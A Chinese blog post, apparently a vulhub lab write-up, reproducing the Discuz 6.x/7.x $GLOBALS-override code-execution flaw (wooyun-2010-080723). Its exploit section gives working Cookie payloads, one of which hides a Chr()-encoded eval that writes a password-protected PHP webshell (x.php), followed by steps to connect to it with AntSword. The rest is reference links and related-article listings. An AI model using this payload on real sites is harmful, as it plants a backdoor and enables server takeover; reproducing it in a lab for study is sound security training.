discuz wooyun-2010-080723

最新推荐文章于 2024-11-08 17:13:37 发布
最新推荐文章于 2024-11-08 17:13:37 发布
阅读量1.9k 收藏
点赞数
分类专栏: vulhub靶场复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_37639863/article/details/122986610
版权
本文详细介绍了如何利用 Discuz! 7.x版本的命令执行漏洞(wooyun-2010-080723),通过覆盖$_REQUEST中的$GLOBALS实现代码执行。实验环境包括Windows10和Ubuntu18 Docker靶场,展示了漏洞原理、复现步骤和实际操作过程,包括设置Cookie和访问URL获取shell。
摘要由CSDN通过智能技术生成

漏洞复现-Discuz-命令执行(wooyun-2010-080723) - 铺哩 - 博客园0x00 实验环境 攻击机:win10 靶机:Ubuntu18 (docker搭建的vulhub靶场) 0x01 影响版本 Discuz 7.x 6.x版本 0x02 实验目的 学习discuz的部分https://www.cnblogs.com/cute-puli/p/13333991.htmlbuuctf [Discuz]wooyun-2010-080723_Fatesec的博客-CSDN博客漏洞描述由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致$_REQUEST中不再包含$_COOKIE,我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞。https://www.secpulse.com/archives/2338.htmlhttps://www.freebuf.com/articles/web/226207.html漏洞复现http://node3.buuoj.cn:28226/install/来安装dihttps://blog.csdn.net/qq_36241198/article/details/115151040Chr(39)是什么意思_百度知道https://zhidao.baidu.com/question/6807826.html漏洞复现-Discuz-命令执行(wooyun-2010-080723)icon-default.png?t=M1FBhttps://www.bbsmax.com/A/gVdnexpX5W/

 

# EXP
Cookie: GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();


GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=eval(Chr(102).Chr(112).Chr(117).Chr(116).Chr(115).Chr(40).Chr(102).Chr(111).Chr(112).Chr(101).Chr(110).Chr(40).Chr(39).Chr(120).Chr(46).Chr(112).Chr(104).Chr(112).Chr(39).Chr(44).Chr(39).Chr(119).Chr(39).Chr(41).Chr(44).Chr(39).Chr(60).Chr(63).Chr(112).Chr(104).Chr(112).Chr(32).Chr(64).Chr(101).Chr(118).Chr(97).Chr(108).Chr(40).Chr(36).Chr(95).Chr(80).Chr(79).Chr(83).Chr(84).Chr(91).Chr(112).Chr(119).Chr(100).Chr(93).Chr(41).Chr(63).Chr(62).Chr(39).Chr(41).Chr(59))



在上述代码中,文件为:x.php   密码为: pwd
然后我们访问http://[IP]:[Port]/x.php,连上写入的马,使用蚁剑连接成功,这样就getshell了:

 

 

B6胶囊
关注
专栏目录
用docker搭建discuz论坛
weixin_44610118的博客
08-21 2549
docker搭建discuz论坛
buuctf [Discuz]wooyun-2010-080723
qq_1873822的博客
03-23 1610
漏洞描述 由于php5.3.x版本里php.ini的设置里request_order默认值为GP, 导致$_REQUEST中不再包含$_COOKIE, 我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞。 https://www.secpulse.com/archives/2338.html https://www.freebuf.com/articles/web/226207.html 漏洞复现 http://node3.buuoj.cn:28226/install/来安装di
【vulhub】Discuz-命令执行 wooyun-2010-080723
weixin_42884199的博客
12-06 1884
一、启动靶机 docker-compose build docker-compose up -d 二、安装 URL: http://192.168.150.146:8080/install 安装数据库。数据库服务器填写db(必须db,不然安装失败),数据库名为discuz,数据库账号密码均为root,管理员密码任意。填写联系方式页面直接点击跳过本步后跳转到首页,登录成功后进入默认板块,开启Burp抓包,然后随便点击一篇贴子 将Cookie修改为下面,点击放包 三、构造payload 请求: GET
wooyu漏洞库YYDS!!!入门之道:重现乌云漏洞库
honest_gg的博客
08-26 617
wooyun乌云漏洞库手把手搭建教程,最全没有之一!!!
Vulhub靶场Discuz-命令执行(wooyun-2010-080723)漏洞复现
X_python321的博客
05-16 448
Discuz-命令执行(wooyun-2010-080723)漏洞复现
Discuz 7.x6.x 全局变量防御绕过导致代码执行(wooyun-2010-080723
黑白的博客
12-06 570
声明 好好学习,天天向上 漏洞描述 由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致REQUEST中不再包含_REQUEST中不再包含R​EQUEST中不再包含_COOKIE,我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞。 影响范围 6.x 7.x 复现过程 使用vulhub 这里使用7.2版本 cd /app/vulhub-master/discuz/wooyun-2010-080723 启动 docker-compose
【漏洞复现-discuz-wooyun-命令执行】vulfocus/discuz-wooyun_2010_080723
10-14 1240
discuz-wooyun-命令执行】Cookie中命令执行
fscan内网渗透神器
09-21
scan是一款内网综合扫描工具,它非常的方便,一键启动,之后完全自动化、并且全方位漏洞扫描。它支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web...
wooyun,乌云月爆201501期总第9期
02-07
乌云月爆是wooyun(乌云)平台发布的漏洞资讯汇总,其内容涉及了当前计算机安全领域新发现的漏洞问题,对于IT安全行业具有重要的参考价值。乌云月爆201501期总第9期详细介绍了多个安全事件和相关的安全漏洞,这些...
Build Your SSRF Exploit Framework SSRF-一个只影响有钱人的漏洞-猪猪侠.pdf
09-17
7. **文件上传与XML滥用**:某些SSRF利用方法涉及文件上传功能,比如Discuz!论坛的URL上传。此外,XML相关的漏洞,如XXE(XML External Entity)和XSLT(XML样式表转换)也可以被用来增强SSRF的效果。攻击者可以利用...
红队系列-网络安全知识锦囊(持续更新)
aming小老弟
11-09 1370
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
vulfocus——discuz命令执行(wooyun-2010-080723
m0_62063669的博客
09-15 1420
如PHP中的system、exec、shell_exec、passthru、popen、proc_popen等,当用户能控制这些函数中的参数时,就可以将恶意系统命令拼接到正常命令中,从而造成命令执行攻击,这就是命令执行漏洞。由于php5.3.x版本里php.ini的设置里request_order默认值为GP, 导致$_REQUEST中不再包含$_COOKIE, 我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞。2.找到一个帖子,然后用burp suite抓包。
Vulhub--wooyun-2010-080723
firecjh的博客
06-10 173
安装成功后,直接找一个已存在的帖子,向其发送数据包,并在。全局变量防御绕过导致代码执行。
vulhub漏洞复现八_discuz
weixin_44193247的博客
01-09 1371
vulhub漏洞复现练习篇
vulhub
赵花花08042的博客
09-16 1141
vulhub Apache HTTPD 换行解析漏洞(CVE-2017-15715) Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。 编译及运行漏洞环境: docker-compose build docker-compose up -d 上传phpinfo()的php代码,修改文件名为1.php bp修改包,找到1.
利用Vulnhub复现漏洞 - Discuz 7.x/6.x 全局变量防御绕过导致代码执行
JiangBuLiu的博客
06-28 929
Discuz 7.x/6.x 全局变量防御绕过导致代码执行Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现 Vulnhub官方复现教程 https://vulhub.org/#/environments/httpd/ssi-rce/ 漏洞原理 由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致$_REQUEST中不再包含$_COOKIE,我们通过...
某运营商广告投放系统SQL注射漏洞 | WooYun-2012-06396 | WooYun.org
05-03 165
某运营商广告投放系统SQL注射漏洞 | WooYun-2012-06396 | WooYun.org 某运营商广告投放系统SQL注射漏洞 | WooYun-2012-06396 | WooYun.org 漏洞概要 关注数(13) 关注此漏洞 缺陷编...
关于Flutter空安全升级方案整理
最新发布
清风洒脱
11-08 1028
Flutter 从 2.0 版本开始支持空安全(Null Safety)。升级到空安全后,由于语法的变动,基本上整个工程,代码都爆红,这对项目来说简直是灾难性的打击,不升级的话只是缓兵之计,因为随着时间的推移,flutter将不再维护非空安全的版本,同时一些三方库也将无法使用,因此空安全升级变成了一个不得不做的事情,项目越复杂需要的时间也就越持久,考虑到对项目的稳定性,和开发周期。选择一个合适自己项目的迁移方案非常重要。下面自己会讲下自己对空安全迁移的理解和实施方案,目前成功迁移几个项目,还是比较有经验的。
【网络】深入理解 HTTPS:确保数据传输安全的核心协议
人生苦短,睡觉要紧,睡醒再说
11-06 1802
HTTPS(HyperText Transfer Protocol Secure)是 HTTP 协议的安全版本。HTTP 是用于客户端与服务器之间传输网页数据的协议,而 HTTPS 在 HTTP 协议的基础上添加了一层SSL/TLS加密协议,使得传输的数据在网络中不易被窃取或篡改。HTTPS 通常用于传输敏感信息,如登录凭证、支付信息、个人数据等。与 HTTP 协议不同,HTTPS 在数据传输过程中会对信息进行加密,确保数据在传输过程中不被第三方监听或修改。
wooyun-2010-09336
01-14
wooyun-2010-09336是2010年发生的一起网络安全漏洞事件。这个漏洞是由于某个网站的后台管理系统存在缺陷,使得攻击者可以绕过身份验证,远程执行恶意代码,从而获取系统的控制权。 当时,一位白帽黑客通过对该网站...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值